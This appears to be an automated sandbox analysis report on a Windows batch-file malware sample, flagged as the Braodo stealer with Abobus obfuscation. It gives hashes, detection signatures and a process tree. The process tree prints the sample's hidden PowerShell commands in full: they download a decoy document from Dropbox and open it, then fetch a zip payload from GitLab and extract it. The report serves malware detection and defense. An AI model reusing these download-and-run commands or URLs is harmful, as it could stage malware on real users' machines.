Edit tour
Windows
Analysis Report
jhsdgfjkh236.bat
Overview
General Information
| Sample name: | jhsdgfjkh236.bat |
| Analysis ID: | 1578274 |
| MD5: | 24679294caaa93cba79e8a89fe3b9ad5 |
| SHA1: | cd76ad906bdb6df31acefa942a30a2cffabda9f1 |
| SHA256: | e5138ceb9edb0277779b64cfea8fc531c4dd7641199acb151d031fb0c8ae0d12 |
| Tags: | batBraodouser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
Abobus Obfuscator, Braodo
| Score: | 88 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
cmd.exe (PID: 8140 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\jhsdg fjkh236.ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8148 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
chcp.com (PID: 7224 cmdline: chcp.com 4 37 MD5: 33395C4732A49065EA72590B14B64F32) - cmd.exe (PID: 7316 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - find.exe (PID: 7360 cmdline:
find MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - findstr.exe (PID: 7396 cmdline:
findstr /L /I set "C :\Users\us er\Desktop \jhsdgfjkh 236.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7468 cmdline:
findstr /L /I goto " C:\Users\u ser\Deskto p\jhsdgfjk h236.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7524 cmdline:
findstr /L /I echo " C:\Users\u ser\Deskto p\jhsdgfjk h236.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 6944 cmdline:
findstr /L /I pause "C:\Users\ user\Deskt op\jhsdgfj kh236.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - find.exe (PID: 7588 cmdline:
find MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - cmd.exe (PID: 7576 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
powershell.exe (PID: 7732 cmdline: powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //www.drop box.com/sc l/fi/mfmem sox3eb9769 rgrajn/Gar min_Campai gn_Informa tion_for_P artners_V1 1.docx?rlk ey=oy421vw zu8dsedagx t4w0ddsw&s t=31jc5byu &dl=1', 'C :\Users\us er\AppData \Local\Tem p\\Garmin_ Campaign_I nformation _for_Partn ers_V11.do cx')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 6604 cmdline:
powershell -WindowSt yle Hidden -Command "Start-Pro cess 'C:\U sers\user\ AppData\Lo cal\Temp\\ Garmin_Cam paign_Info rmation_fo r_Partners _V11.docx' " MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7056 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //gitlab.c om/fgh8090 051/jgh/-/ raw/main/F Ga1812.zip ', 'C:\Use rs\Public\ Document.z ip')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 2220 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "Add-T ype -Assem blyName Sy stem.IO.Co mpression. FileSystem ; [System. IO.Compres sion.ZipFi le]::Extra ctToDirect ory('C:/Us ers/Public /Document. zip', 'C:/ Users/Publ ic/Documen t')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_AbobusObfuscator | Yara detected Abobus Obfuscator | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Integrated Neural Analysis Model: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | JA3 fingerprint: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | String found in binary or memory: | ||